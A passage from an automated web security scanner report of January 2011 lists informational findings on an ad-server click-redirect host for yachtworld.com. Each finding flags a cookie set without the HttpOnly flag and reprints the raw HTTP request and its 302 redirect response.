Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1813621051/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1813621051/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm
...[SNIP]...

4.38. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkkU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

4.39. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/218394558/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-motoryacht-728.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/218394558/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-motoryacht-728.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/218394558/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-motoryacht-728.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldcharters.com
Content-Length: 310
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldcharters.com">here</a>.</p
...[SNIP]...

4.40. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/406859034/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blk-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/406859034/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blk-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/406859034/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blk-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm
...[SNIP]...

4.41. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/616229800/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-harbor-728.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/616229800/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-harbor-728.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/616229800/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-harbor-728.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldcharters.com
Content-Length: 310
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldcharters.com">here</a>.</p
...[SNIP]...

4.42. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/658221905/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/658221905/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/658221905/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm
...[SNIP]...

4.43. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1040445805/Right1/Boats/byh10-ywmobile-yen-sr/yw-mobile-blk-en-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1040445805/Right1/Boats/byh10-ywmobile-yen-sr/yw-mobile-blk-en-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1040445805/Right1/Boats/byh10-ywmobile-yen-sr/yw-mobile-blk-en-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-content/2010/01/21/yachtworldcom-goes-mobile/
Content-Length: 353
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-content/2010/01/
...[SNIP]...

4.44. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1125872364/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1125872364/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1125872364/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/core/insurance/insurance.jsp
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/core/insurance/insura
...[SNIP]...

4.45. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1371771958/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1371771958/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1371771958/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

4.46. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1552147843/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1552147843/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1552147843/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/core/insurance/insurance.jsp
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/core/insurance/insura
...[SNIP]...

4.47. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/2013449512/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/2013449512/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/2013449512/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

4.48. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086285/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-mtn-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086285/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-mtn-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086285/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-mtn-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldcharters.com
Content-Length: 310
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldcharters.com">here</a>.</p
...[SNIP]...

4.49. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/423429032/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/423429032/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/423429032/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

4.50. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/779597469/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/779597469/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/779597469/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?
...[SNIP]...

4.51. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/83419808/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-catamaran-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
